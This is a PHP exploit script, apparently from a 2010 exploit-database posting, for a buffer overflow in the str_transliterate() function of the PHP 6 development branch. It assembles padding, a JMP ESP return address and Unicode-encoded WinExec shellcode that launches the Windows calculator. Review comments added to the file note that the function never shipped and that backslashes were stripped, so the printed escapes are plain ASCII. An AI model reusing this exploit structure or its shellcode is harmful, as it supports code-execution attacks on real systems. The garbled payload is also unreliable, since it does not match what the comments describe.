# Title : PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
# Published : 2010-04-04
# Author : Pr0T3cT10n
<?php
error_reporting(0); # silences every diagnostic, so an undefined str_transliterate() dies without any visible error
#####################################################################
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
## Buffer Overflow
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Exploited by TheLeader, Debug
## SP. Thanks: HDM
## http://www.nullbyte.org.il
#####################################################################
## This code should exploit a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
## Take a look, 'unicode.semantics' has to be on!
## php.ini > unicode.semantics = on
#####################################################################
## NOTE(review): str_transliterate() and the 'unicode.semantics' directive belong to the
## abandoned PHP 6 unicode branch; no released PHP version ships either. On a current
## interpreter ini_get() returns false for the unknown directive, ini_get_bool() maps that
## to false, and the script takes the exit() branch without ever reaching the call.
## NOTE(review): the literals below read "u4141", "u9090", and the exit message ends in
## "rn" -- PHP 6 wrote unicode escapes as "\u4141" and the message presumably ended in
## "\r\n", so backslashes look stripped by page extraction; as printed these are plain ASCII.
if(ini_get_bool('unicode.semantics')) { # helper is declared after this block; PHP hoists top-level function declarations, so the forward call resolves
$buff = str_repeat("u4141", 256);
$eip = "u1445u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
$nops = str_repeat("u9090", 20);
# WinExec Calc XP SP3 HEB Unicode-encoded shellcode
$shellcode = "u02EBu05EBuF9E8uFFFFu33FFu5BC0u4388u8315u11C3uBB53u250Du7C86uD3FFu6163u636Cu414E";
# WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)
# $shellcode = "u02EBu05EBuF9E8uFFFFu33FFu5BC0u4388u8315u11C3uBB53u23ADu7C86uD3FFu6163u636Cu414E";
$exploit = $buff.$eip.$nops.$shellcode;
str_transliterate(0, $exploit, 0); # the overflowing call; the meaning of the first and third arguments (both 0) is not documented on this page
} else {
exit("Error! 'unicode.semantics' has be on!rn"); # runtime string left as printed; "rn" is presumably "\r\n"
}
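/**
 * Read an ini directive and interpret its value as a boolean, following the
 * engine's own spelling rules: "on"/"yes"/"true" are true, "stdout"/"stderr"
 * count as true only for display_errors, and anything else goes through an
 * int cast ("1" -> true, "0"/"off"/"" -> false).
 *
 * @param string $a Name of the ini directive to read.
 * @return bool False when the directive is unknown to this interpreter.
 */
function ini_get_bool($a) {
    $b = ini_get($a);
    // ini_get() returns false for a directive the engine does not know;
    // handle that before strtolower() sees a non-string (deprecated in 8.1).
    // The result is the same false the original int cast produced.
    if ($b === false) {
        return false;
    }
    $v = strtolower((string) $b);
    if ($v === 'on' || $v === 'yes' || $v === 'true') {
        // assert.active is the one directive for which these words are NOT treated as enabled.
        return 'assert.active' !== $a;
    }
    if ($v === 'stdout' || $v === 'stderr') {
        // Output-target values only mean "enabled" for display_errors.
        return 'display_errors' === $a;
    }
    return (bool) (int) $b;
}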
?>